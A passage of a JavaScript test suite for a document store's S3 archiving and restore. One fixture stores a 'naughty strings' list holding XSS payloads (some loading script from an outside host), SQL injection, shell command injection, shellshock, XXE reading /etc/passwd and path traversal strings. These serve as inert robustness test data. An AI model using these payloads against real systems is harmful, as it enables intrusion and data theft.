} + })(doc, i) + ) + return async.series(jobs, done) + }) + }) + }) + + describe('a deleted doc', function () { + beforeEach(function (done) { + this.project_id = new ObjectId() + this.doc = { + _id: new ObjectId(), + lines: ['one', 'two', 'three'], + ranges: {}, + version: 2, + } + return DocstoreClient.createDoc( + this.project_id, + this.doc._id, + this.doc.lines, + this.doc.version, + this.doc.ranges, + error => { + if (error != null) { + throw error + } + return DocstoreClient.deleteDoc( + this.project_id, + this.doc._id, + error => { + if (error != null) { + throw error + } + return DocstoreClient.archiveAllDoc( + this.project_id, + (error, res) => { + this.res = res + if (error != null) { + throw error + } + return done() + } + ) + } + ) + } + ) + }) + + it('should successully archive the docs', function (done) { + this.res.statusCode.should.equal(204) + return done() + }) + + it('should set inS3 and unset lines and ranges in each doc', function (done) { + return db.docs.findOne({ _id: this.doc._id }, (error, doc) => { + if (error != null) { + throw error + } + expect(doc.lines).not.to.exist + expect(doc.ranges).not.to.exist + doc.inS3.should.equal(true) + doc.deleted.should.equal(true) + return done() + }) + }) + + it('should set the doc in s3 correctly', function (done) { + return DocstoreClient.getS3Doc( + this.project_id, + this.doc._id, + (error, s3Doc) => { + if (error != null) { + throw error + } + s3Doc.lines.should.deep.equal(this.doc.lines) + s3Doc.ranges.should.deep.equal(this.doc.ranges) + return done() + } + ) + }) + + describe('after unarchiving from a request for the project', function () { + beforeEach(function (done) { + return DocstoreClient.getAllDocs( + this.project_id, + (error, res, fetchedDocs) => { + this.fetched_docs = fetchedDocs + if (error != null) { + throw error + } + return done() + } + ) + }) + + it('should not included the deleted', function (done) { + this.fetched_docs.length.should.equal(0) + return done() + }) + + return it('should restore the doc to mongo', function (done) { + return db.docs.findOne({ _id: this.doc._id }, (error, doc) => { + if (error != null) { + throw error + } + doc.lines.should.deep.equal(this.doc.lines) + doc.ranges.should.deep.equal(this.doc.ranges) + expect(doc.inS3).not.to.exist + doc.deleted.should.equal(true) + return done() + }) + }) + }) + + describe('when keepSoftDeletedDocsArchived is enabled', function () { + let keepSoftDeletedDocsArchived + beforeEach(function overwriteSetting() { + keepSoftDeletedDocsArchived = + Settings.docstore.keepSoftDeletedDocsArchived + Settings.docstore.keepSoftDeletedDocsArchived = true + }) + afterEach(function restoreSetting() { + Settings.docstore.keepSoftDeletedDocsArchived = + keepSoftDeletedDocsArchived + }) + + describe('after unarchiving from a request for the project', function () { + beforeEach(function (done) { + DocstoreClient.getAllDocs( + this.project_id, + (error, res, fetchedDocs) => { + this.fetched_docs = fetchedDocs + if (error) { + return done(error) + } + done() + } + ) + }) + + it('should not included the deleted', function (done) { + this.fetched_docs.length.should.equal(0) + done() + }) + + it('should not have restored the deleted doc to mongo', function (done) { + db.docs.findOne({ _id: this.doc._id }, (error, doc) => { + if (error) { + return done(error) + } + expect(doc.lines).to.not.exist + expect(doc.ranges).to.not.exist + expect(doc.inS3).to.equal(true) + expect(doc.deleted).to.equal(true) + done() + }) + }) + }) + }) + }) + + describe('archiving a single doc', function () { + before(function (done) { + this.project_id = new ObjectId() + this.timeout(1000 * 30) + this.doc = { + _id: new ObjectId(), + lines: ['foo', 'bar'], + ranges: {}, + version: 2, + } + DocstoreClient.createDoc( + this.project_id, + this.doc._id, + this.doc.lines, + this.doc.version, + this.doc.ranges, + error => { + if (error) { + return done(error) + } + DocstoreClient.archiveDoc( + this.project_id, + this.doc._id, + (error, res) => { + this.res = res + if (error) { + return done(error) + } + done() + } + ) + } + ) + }) + + it('should successully archive the doc', function (done) { + this.res.statusCode.should.equal(204) + done() + }) + + it('should set inS3 and unset lines and ranges in the doc', function (done) { + db.docs.findOne({ _id: this.doc._id }, (error, doc) => { + if (error) { + return done(error) + } + expect(doc.lines).not.to.exist + expect(doc.ranges).not.to.exist + doc.inS3.should.equal(true) + done() + }) + }) + + it('should set the doc in s3 correctly', function (done) { + DocstoreClient.getS3Doc(this.project_id, this.doc._id, (error, s3Doc) => { + if (error) { + return done(error) + } + s3Doc.lines.should.deep.equal(this.doc.lines) + s3Doc.ranges.should.deep.equal(this.doc.ranges) + done() + }) + }) + }) + + describe('a doc with large lines', function () { + before(function (done) { + this.project_id = new ObjectId() + this.timeout(1000 * 30) + const quarterMegInBytes = 250000 + const bigLine = require('node:crypto') + .randomBytes(quarterMegInBytes) + .toString('hex') + this.doc = { + _id: new ObjectId(), + lines: [bigLine, bigLine, bigLine, bigLine], + ranges: {}, + version: 2, + } + return DocstoreClient.createDoc( + this.project_id, + this.doc._id, + this.doc.lines, + this.doc.version, + this.doc.ranges, + error => { + if (error != null) { + throw error + } + return DocstoreClient.archiveAllDoc(this.project_id, (error, res) => { + this.res = res + if (error != null) { + throw error + } + return done() + }) + } + ) + }) + + it('should successully archive the docs', function (done) { + this.res.statusCode.should.equal(204) + return done() + }) + + it('should set inS3 and unset lines and ranges in each doc', function (done) { + return db.docs.findOne({ _id: this.doc._id }, (error, doc) => { + if (error != null) { + throw error + } + expect(doc.lines).not.to.exist + expect(doc.ranges).not.to.exist + doc.inS3.should.equal(true) + return done() + }) + }) + + it('should set the doc in s3 correctly', function (done) { + return DocstoreClient.getS3Doc( + this.project_id, + this.doc._id, + (error, s3Doc) => { + if (error != null) { + throw error + } + s3Doc.lines.should.deep.equal(this.doc.lines) + s3Doc.ranges.should.deep.equal(this.doc.ranges) + return done() + } + ) + }) + + return describe('after unarchiving from a request for the project', function () { + before(function (done) { + return DocstoreClient.getAllDocs( + this.project_id, + (error, res, fetchedDocs) => { + this.fetched_docs = fetchedDocs + if (error != null) { + throw error + } + return done() + } + ) + }) + + return it('should restore the doc to mongo', function (done) { + return db.docs.findOne({ _id: this.doc._id }, (error, doc) => { + if (error != null) { + throw error + } + doc.lines.should.deep.equal(this.doc.lines) + doc.ranges.should.deep.equal(this.doc.ranges) + expect(doc.inS3).not.to.exist + return done() + }) + }) + }) + }) + + describe('a doc with naughty strings', function () { + before(function (done) { + this.project_id = new ObjectId() + this.doc = { + _id: new ObjectId(), + lines: [ + '', + 'undefined', + 'undef', + 'null', + 'NULL', + '(null)', + 'nil', + 'NIL', + 'true', + 'false', + 'True', + 'False', + 'None', + '\\', + '\\\\', + '0', + '1', + '1.00', + '$1.00', + '1/2', + '1E2', + '1E02', + '1E+02', + '-1', + '-1.00', + '-$1.00', + '-1/2', + '-1E2', + '-1E02', + '-1E+02', + '1/0', + '0/0', + '-2147483648/-1', + '-9223372036854775808/-1', + '0.00', + '0..0', + '.', + '0.0.0', + '0,00', + '0,,0', + ',', + '0,0,0', + '0.0/0', + '1.0/0.0', + '0.0/0.0', + '1,0/0,0', + '0,0/0,0', + '--1', + '-', + '-.', + '-,', + '999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999', + 'NaN', + 'Infinity', + '-Infinity', + '0x0', + '0xffffffff', + '0xffffffffffffffff', + '0xabad1dea', + '123456789012345678901234567890123456789', + '1,000.00', + '1 000.00', + "1'000.00", + '1,000,000.00', + '1 000 000.00', + "1'000'000.00", + '1.000,00', + '1 000,00', + "1'000,00", + '1.000.000,00', + '1 000i̳̞v̢͇ḙ͎͟-҉̭̩̼͔m̤̭̫i͕͇̝̦n̗͙ḍ̟ ̯̲͕͞ǫ̟̯̰̲͙̻̝f ̪̰̰̗̖̭̘͘c̦͍̲̞͍̩̙ḥ͚a̮͎̟̙͜ơ̩̹͎s̤.̝̝ ҉Z̡̖̜͖̰̣͉̜a͖̰͙̬͡l̲̫̳͍̩g̡̟̼̱͚̞̬ͅo̗͜.̟', + '̦H̬̤̗̤͝e͜ ̜̥̝̻͍̟́w̕h̖̯͓o̝͙̖͎̱̮ ҉̺̙̞̟͈W̷̼̭a̺̪͍į͈͕̭͙̯̜t̶̼̮s̘͙͖̕ ̠̫̠B̻͍͙͉̳ͅe̵h̵̬͇̫͙i̹͓̳̳̮͎̫̕n͟d̴̪̜̖ ̰͉̩͇͙̲͞ͅT͖̼͓̪͢h͏͓̮̻e̬̝̟ͅ ̤̹̝W͙̞̝͔͇͝ͅa͏͓͔̹̼̣l̴͔̰̤̟͔ḽ̫.͕', + 'Z̮̞̠͙͔ͅḀ̗̞͈̻̗Ḷ͙͎̯̹̞͓G̻O̭̗̮', + "˙ɐnbᴉlɐ ɐuƃɐɯ ǝɹolop ʇǝ ǝɹoqɐl ʇn ʇunpᴉpᴉɔuᴉ ɹodɯǝʇ poɯsnᴉǝ op pǝs 'ʇᴉlǝ ƃuᴉɔsᴉdᴉpɐ ɹnʇǝʇɔǝsuoɔ 'ʇǝɯɐ ʇᴉs ɹolop ɯnsdᴉ ɯǝɹo˥", + '00˙Ɩ$-', + 'The quick brown fox jumps over the lazy dog', + '𝐓𝐡𝐞 𝐪𝐮𝐢𝐜𝐤 𝐛𝐫𝐨𝐰𝐧 𝐟𝐨𝐱 𝐣𝐮𝐦𝐩𝐬 𝐨𝐯𝐞𝐫 𝐭𝐡𝐞 𝐥𝐚𝐳𝐲 𝐝𝐨𝐠', + '𝕿𝖍𝖊 𝖖𝖚𝖎𝖈𝖐 𝖇𝖗𝖔𝖜𝖓 𝖋𝖔𝖝 𝖏𝖚𝖒𝖕𝖘 𝖔𝖛𝖊𝖗 𝖙𝖍𝖊 𝖑𝖆𝖟𝖞 𝖉𝖔𝖌', + '𝑻𝒉𝒆 𝒒𝒖𝒊𝒄𝒌 𝒃𝒓𝒐𝒘𝒏 𝒇𝒐𝒙 𝒋𝒖𝒎𝒑𝒔 𝒐𝒗𝒆𝒓 𝒕𝒉𝒆 𝒍𝒂𝒛𝒚 𝒅𝒐𝒈', + '𝓣𝓱𝓮 𝓺𝓾𝓲𝓬𝓴 𝓫𝓻𝓸𝔀𝓷 𝓯𝓸𝔁 𝓳𝓾𝓶𝓹𝓼 𝓸𝓿𝓮𝓻 𝓽𝓱𝓮 𝓵𝓪𝔃𝔂 𝓭𝓸𝓰', + '𝕋𝕙𝕖 𝕢𝕦𝕚𝕔𝕜 𝕓𝕣𝕠𝕨𝕟 𝕗𝕠𝕩 𝕛𝕦𝕞𝕡𝕤 𝕠𝕧𝕖𝕣 𝕥𝕙𝕖 𝕝𝕒𝕫𝕪 𝕕𝕠𝕘', + '𝚃𝚑𝚎 𝚚𝚞𝚒𝚌𝚔 𝚋𝚛𝚘𝚠𝚗 𝚏𝚘𝚡 𝚓𝚞𝚖𝚙𝚜 𝚘𝚟𝚎𝚛 𝚝𝚑𝚎 𝚕𝚊𝚣𝚢 𝚍𝚘𝚐', + '⒯⒣⒠ ⒬⒰⒤⒞⒦ ⒝⒭⒪⒲⒩ ⒡⒪⒳ ⒥⒰⒨⒫⒮ ⒪⒱⒠⒭ ⒯⒣⒠ ⒧⒜⒵⒴ ⒟⒪⒢', + '<script>alert(123)</script>', + '<script>alert('123');</script>', + '<img src=x onerror=alert(123) />', + '<svg><script>123<1>alert(123)</script> ', + '"><script>alert(123)</script>', + "'><script>alert(123)</script>", + '><script>alert(123)</script>', + '</script><script>alert(123)</script>', + '< / script >< script >alert(123)< / script >', + ' onfocus=JaVaSCript:alert(123) autofocus ', + '" onfocus=JaVaSCript:alert(123) autofocus ', + "' onfocus=JaVaSCript:alert(123) autofocus ", + '<script>alert(123)</script>', + '<sc<script>ript>alert(123)</sc</script>ript>', + '--><script>alert(123)</script>', + '";alert(123);t="', + "';alert(123);t='", + 'JavaSCript:alert(123)', + ';alert(123);', + 'src=JaVaSCript:prompt(132)', + '"><script>alert(123);</script x="', + "'><script>alert(123);</script x='", + '><script>alert(123);</script x=', + '" autofocus onkeyup="javascript:alert(123)', + "' autofocus onkeyup='javascript:alert(123)", + '<script\\x20type="text/javascript">javascript:alert(1);</script>', + '<script\\x3Etype="text/javascript">javascript:alert(1);</script>', + '<script\\x0Dtype="text/javascript">javascript:alert(1);</script>', + '<script\\x09type="text/javascript">javascript:alert(1);</script>', + '<script\\x0Ctype="text/javascript">javascript:alert(1);</script>', + '<script\\x2Ftype="text/javascript">javascript:alert(1);</script>', + '<script\\x0Atype="text/javascript">javascript:alert(1);</script>', + '\'`"><\\x3Cscript>javascript:alert(1)</script> ', + '\'`"><\\x00script>javascript:alert(1)</script>', + 'ABC<div style="x\\x3Aexpression(javascript:alert(1)">DEF', + 'ABC<div style="x:expression\\x5C(javascript:alert(1)">DEF', + 'ABC<div style="x:expression\\x00(javascript:alert(1)">DEF', + 'ABC<div style="x:exp\\x00ression(javascript:alert(1)">DEF', + 'ABC<div style="x:exp\\x5Cression(javascript:alert(1)">DEF', + 'ABC<div style="x:\\x0Aexpression(javascript:alert(1)">DEF', + 'ABC<div style="x:\\x09expression(javascript:alert(1)">DEF', + 'ABC<div style="x:\\xE3\\x80\\x80expression(javascript:alert(1)">DEF', + 'ABC<div style="x:\\xE2\\x80\\x84expression(javascript:alert(1)">DEF', + 'ABC<div style="x:\\xC2\\xA0expression(javascript:alert(1)">DEF', + 'ABC<div style="x:\\xE2\\x80\\x80expression(javascript:alert(1)">DEF', + 'ABC<div style="x:\\xE2\\x80\\x8Aexpression(javascript:alert(1)">DEF', + 'ABC<div style="x:\\x0Dexpression(javascript:alert(1)">DEF', + 'ABC<div style="x:\\x0Cexpression(javascript:alert(1)">DEF', + 'ABC<div style="x:\\xE2\\x80\\x87expression(javascript:alert(1)">DEF', + 'ABC<div style="x:\\xEF\\xBB\\xBFexpression(javascript:alert(1)">DEF', + 'ABC<div style="x:\\x20expression(javascript:alert(1)">DEF', + 'ABC<div style="x:\\xE2\\x80\\x88expression(javascript:alert(1)">DEF', + 'ABC<div style="x:\\x00expression(javascript:alert(1)">DEF', + 'ABC<div style="x:\\xE2\\x80\\x8Bexpression(javascript:alert(1)">DEF', + 'ABC<div style="x:\\xE2\\x80\\x86expression(javascript:alert(1)">DEF', + 'ABC<div style="x:\\xE2\\x80\\x85expression(javascript:alert(1)">DEF', + 'ABC<div style="x:\\xE2\\x80\\x82expression(javascript:alert(1)">DEF', + 'ABC<div style="x:\\x0Bexpression(javascript:alert(1)">DEF', + 'ABC<div style="x:\\xE2\\x80\\x81expression(javascript:alert(1)">DEF', + 'ABC<div style="x:\\xE2\\x80\\x83expression(javascript:alert(1)">DEF', + 'ABC<div style="x:\\xE2\\x80\\x89expression(javascript:alert(1)">DEF', + '<a href="\\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\xC2\\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\xE1\\xA0\\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\xE2\\x80\\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\xE2\\x80\\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\xE2\\x80\\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\xE2\\x80\\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\xE2\\x80\\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\xE2\\x80\\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\xE2\\x80\\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\xE2\\x80\\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\xE1\\x9A\\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\xE2\\x80\\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\xE2\\x80\\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\xE2\\x80\\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\xE3\\x80\\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\xE2\\x80\\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\xE2\\x80\\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\xE2\\x80\\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\xE2\\x81\\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="\\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="javascript\\x00:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="javascript\\x3A:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="javascript\\x09:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="javascript\\x0D:javascript:alert(1)" id="fuzzelement1">test</a>', + '<a href="javascript\\x0A:javascript:alert(1)" id="fuzzelement1">test</a>', + '`"\'><img src=xxx:x \\x0Aonerror=javascript:alert(1)>', + '`"\'><img src=xxx:x \\x22onerror=javascript:alert(1)>', + '`"\'><img src=xxx:x \\x0Bonerror=javascript:alert(1)>', + '`"\'><img src=xxx:x \\x0Donerror=javascript:alert(1)>', + '`"\'><img src=xxx:x \\x2Fonerror=javascript:alert(1)>', + '`"\'><img src=xxx:x \\x09onerror=javascript:alert(1)>', + '`"\'><img src=xxx:x \\x0Conerror=javascript:alert(1)>', + '`"\'><img src=xxx:x \\x00onerror=javascript:alert(1)>', + '`"\'><img src=xxx:x \\x27onerror=javascript:alert(1)>', + '`"\'><img src=xxx:x \\x20onerror=javascript:alert(1)>', + '"`\'><script>\\x3Bjavascript:alert(1)</script>', + '"`\'><script>\\x0Djavascript:alert(1)</script>', + '"`\'><script>\\xEF\\xBB\\xBFjavascript:alert(1)</script>', + '"`\'><script>\\xE2\\x80\\x81javascript:alert(1)</script>', + '"`\'><script>\\xE2\\x80\\x84javascript:alert(1)</script>', + '"`\'><script>\\xE3\\x80\\x80javascript:alert(1)</script>', + '"`\'><script>\\x09javascript:alert(1)</script>', + '"`\'><script>\\xE2\\x80\\x89javascript:alert(1)</script>', + '"`\'><script>\\xE2\\x80\\x85javascript:alert(1)</script>', + '"`\'><script>\\xE2\\x80\\x88javascript:alert(1)</script>', + '"`\'><script>\\x00javascript:alert(1)</script>', + '"`\'><script>\\xE2\\x80\\xA8javascript:alert(1)</script>', + '"`\'><script>\\xE2\\x80\\x8Ajavascript:alert(1)</script>', + '"`\'><script>\\xE1\\x9A\\x80javascript:alert(1)</script>', + '"`\'><script>\\x0Cjavascript:alert(1)</script>', + '"`\'><script>\\x2Bjavascript:alert(1)</script>', + '"`\'><script>\\xF0\\x90\\x96\\x9Ajavascript:alert(1)</script>', + '"`\'><script>-javascript:alert(1)</script>', + '"`\'><script>\\x0Ajavascript:alert(1)</script>', + '"`\'><script>\\xE2\\x80\\xAFjavascript:alert(1)</script>', + '"`\'><script>\\x7Ejavascript:alert(1)</script>', + '"`\'><script>\\xE2\\x80\\x87javascript:alert(1)</script>', + '"`\'><script>\\xE2\\x81\\x9Fjavascript:alert(1)</script>', + '"`\'><script>\\xE2\\x80\\xA9javascript:alert(1)</script>', + '"`\'><script>\\xC2\\x85javascript:alert(1)</script>', + '"`\'><script>\\xEF\\xBF\\xAEjavascript:alert(1)</script>', + '"`\'><script>\\xE2\\x80\\x83javascript:alert(1)</script>', + '"`\'><script>\\xE2\\x80\\x8Bjavascript:alert(1)</script>', + '"`\'><script>\\xEF\\xBF\\xBEjavascript:alert(1)</script>', + '"`\'><script>\\xE2\\x80\\x80javascript:alert(1)</script>', + '"`\'><script>\\x21javascript:alert(1)</script>', + '"`\'><script>\\xE2\\x80\\x82javascript:alert(1)</script>', + '"`\'><script>\\xE2\\x80\\x86javascript:alert(1)</script>', + '"`\'><script>\\xE1\\xA0\\x8Ejavascript:alert(1)</script>', + '"`\'><script>\\x0Bjavascript:alert(1)</script>', + '"`\'><script>\\x20javascript:alert(1)</script>', + '"`\'><script>\\xC2\\xA0javascript:alert(1)</script>', + '<img \\x00src=x onerror="alert(1)">', + '<img \\x47src=x onerror="javascript:alert(1)">', + '<img \\x11src=x onerror="javascript:alert(1)">', + '<img \\x12src=x onerror="javascript:alert(1)">', + '<img\\x47src=x onerror="javascript:alert(1)">', + '<img\\x10src=x onerror="javascript:alert(1)">', + '<img\\x13src=x onerror="javascript:alert(1)">', + '<img\\x32src=x onerror="javascript:alert(1)">', + '<img\\x47src=x onerror="javascript:alert(1)">', + '<img\\x11src=x onerror="javascript:alert(1)">', + '<img \\x47src=x onerror="javascript:alert(1)">', + '<img \\x34src=x onerror="javascript:alert(1)">', + '<img \\x39src=x onerror="javascript:alert(1)">', + '<img \\x00src=x onerror="javascript:alert(1)">', + '<img src\\x09=x onerror="javascript:alert(1)">', + '<img src\\x10=x onerror="javascript:alert(1)">', + '<img src\\x13=x onerror="javascript:alert(1)">', + '<img src\\x32=x onerror="javascript:alert(1)">', + '<img src\\x12=x onerror="javascript:alert(1)">', + '<img src\\x11=x onerror="javascript:alert(1)">', + '<img src\\x00=x onerror="javascript:alert(1)">', + '<img src\\x47=x onerror="javascript:alert(1)">', + '<img src=x\\x09onerror="javascript:alert(1)">', + '<img src=x\\x10onerror="javascript:alert(1)">', + '<img src=x\\x11onerror="javascript:alert(1)">', + '<img src=x\\x12onerror="javascript:alert(1)">', + '<img src=x\\x13onerror="javascript:alert(1)">', + '<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)">', + '<img src=x onerror=\\x09"javascript:alert(1)">', + '<img src=x onerror=\\x10"javascript:alert(1)">', + '<img src=x onerror=\\x11"javascript:alert(1)">', + '<img src=x onerror=\\x12"javascript:alert(1)">', + '<img src=x onerror=\\x32"javascript:alert(1)">', + '<img src=x onerror=\\x00"javascript:alert(1)">', + '<a href=java script:javascript:alert(1)>XXX</a>', + '<img src="x` `<script>javascript:alert(1)</script>"` `>', + '<img src onerror /" \'"= alt=javascript:alert(1)//">', + '<title onpropertychange=javascript:alert(1)>', + '<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>">', + '<!--[if]><script>javascript:alert(1)</script -->', + '<!--[if<img src=x onerror=javascript:alert(1)//]> -->', + '<script src="/\\%(jscript)s"></script>', + '<script src="\\\\%(jscript)s"></script>', + '<IMG """><SCRIPT>alert("XSS")</SCRIPT>">', + '<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>', + '<IMG SRC=# onmouseover="alert(\'xxs\')">', + '<IMG SRC= onmouseover="alert(\'xxs\')">', + '<IMG onmouseover="alert(\'xxs\')">', + '<IMG SRC=javascript:alert('XSS')>', + '<IMG SRC=javascript:alert('XSS')>', + '<IMG SRC=javascript:alert('XSS')>', + '<IMG SRC="jav ascript:alert(\'XSS\');">', + '<IMG SRC="jav ascript:alert(\'XSS\');">', + '<IMG SRC="jav ascript:alert(\'XSS\');">', + '<IMG SRC="jav ascript:alert(\'XSS\');">', + 'perl -e \'print "<IMG SRC=java\\0script:alert(\\"XSS\\")>";\' > out', + '<IMG SRC="  javascript:alert(\'XSS\');">', + '<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>', + '<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert("XSS")>', + '<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>', + '<<SCRIPT>alert("XSS");//<</SCRIPT>', + '<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >', + '<SCRIPT SRC=//ha.ckers.org/.j>', + '<IMG SRC="javascript:alert(\'XSS\')"', + '<iframe src=http://ha.ckers.org/scriptlet.html <', + "\\\";alert('XSS');//", + '<plaintext>', + '1;DROP TABLE users', + "1'; DROP TABLE users-- 1", + "' OR 1=1 -- 1", + "' OR '1'='1", + '-', + '--', + '--version', + '--help', + '$USER', + '/dev/null; touch /tmp/blns.fail ; echo', + '`touch /tmp/blns.fail`', + '$(touch /tmp/blns.fail)', + '@{[system "touch /tmp/blns.fail"]}', + 'eval("puts \'hello world\'")', + 'System("ls -al /")', + '`ls -al /`', + 'Kernel.exec("ls -al /")', + 'Kernel.exit(1)', + "%x('ls -al /')", + '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>', + '$HOME', + "$ENV{'HOME'}", + '%d', + '%s', + '%*.*s', + '../../../../../../../../../../../etc/passwd%00', + '../../../../../../../../../../../etc/hosts', + '() { 0; }; touch /tmp/blns.shellshock1.fail;', + '() { _; } >_[$($())] { touch /tmp/blns.shellshock2.fail; }', + 'CON', + 'PRN', + 'AUX', + 'CLOCK$', + 'NUL', + 'A:', + 'ZZ:', + 'COM1', + 'LPT1', + 'LPT2', + 'LPT3', + 'COM2', + 'COM3', + 'COM4', + 'Scunthorpe General Hospital', + 'Penistone Community Church', + 'Lightwater Country Park', + 'Jimmy Clitheroe', + 'Horniman Museum', + 'shitake mushrooms', + 'RomansInSussex.co.uk', + 'http://www.cum.qc.ca/', + 'Craig Cockburn, Software Specialist', + 'Linda Callahan', + 'Dr. Herman I. Libshitz', + 'magna cum laude', + 'Super Bowl XXX', + 'medieval erection of parapets', + 'evaluate', + 'mocha', + 'expression', + 'Arsenal canal', + 'classic', + 'Tyson Gay', + "If you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your dream, but we hope it works. Please wake up, we miss you.", + 'Roses are \u001b[0;31mred\u001b[0m, violets are \u001b[0;34mblue. Hope you enjoy terminal hue', + 'But now...\u001b[20Cfor my greatest trick...\u001b[8m', + 'The quic\b\b\b\b\b\bk brown fo\u0007\u0007\u0007\u0007\u0007\u0007\u0007\u0007\u0007\u0007\u0007x... [Beeeep]', + 'Powerلُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ冗', + ], + ranges: {}, + version: 2, + } + return DocstoreClient.createDoc( + this.project_id, + this.doc._id, + this.doc.lines, + this.doc.version, + this.doc.ranges, + error => { + if (error != null) { + throw error + } + return DocstoreClient.archiveAllDoc(this.project_id, (error, res) => { + this.res = res + if (error != null) { + throw error + } + return done() + }) + } + ) + }) + + it('should successully archive the docs', function (done) { + this.res.statusCode.should.equal(204) + return done() + }) + + it('should set inS3 and unset lines and ranges in each doc', function (done) { + return db.docs.findOne({ _id: this.doc._id }, (error, doc) => { + if (error != null) { + throw error + } + expect(doc.lines).not.to.exist + expect(doc.ranges).not.to.exist + doc.inS3.should.equal(true) + return done() + }) + }) + + it('should set the doc in s3 correctly', function (done) { + return DocstoreClient.getS3Doc( + this.project_id, + this.doc._id, + (error, s3Doc) => { + if (error != null) { + throw error + } + s3Doc.lines.should.deep.equal(this.doc.lines) + s3Doc.ranges.should.deep.equal(this.doc.ranges) + return done() + } + ) + }) + + return describe('after unarchiving from a request for the project', function () { + before(function (done) { + return DocstoreClient.getAllDocs( + this.project_id, + (error, res, fetchedDocs) => { + this.fetched_docs = fetchedDocs + if (error != null) { + throw error + } + return done() + } + ) + }) + + return it('should restore the doc to mongo', function (done) { + return db.docs.findOne({ _id: this.doc._id }, (error, doc) => { + if (error != null) { + throw error + } + doc.lines.should.deep.equal(this.doc.lines) + doc.ranges.should.deep.equal(this.doc.ranges) + expect(doc.inS3).not.to.exist + return done() + }) + }) + }) + }) + + describe('a doc with ranges', function () { + before(function (done) { + this.project_id = new ObjectId() + this.doc = { + _id: new ObjectId(), + lines: ['one', 'two', 'three'], + ranges: { + changes: [ + { + id: new ObjectId(), + op: { i: 'foo', p: 24 }, + metadata: { + user_id: new ObjectId(), + ts: new 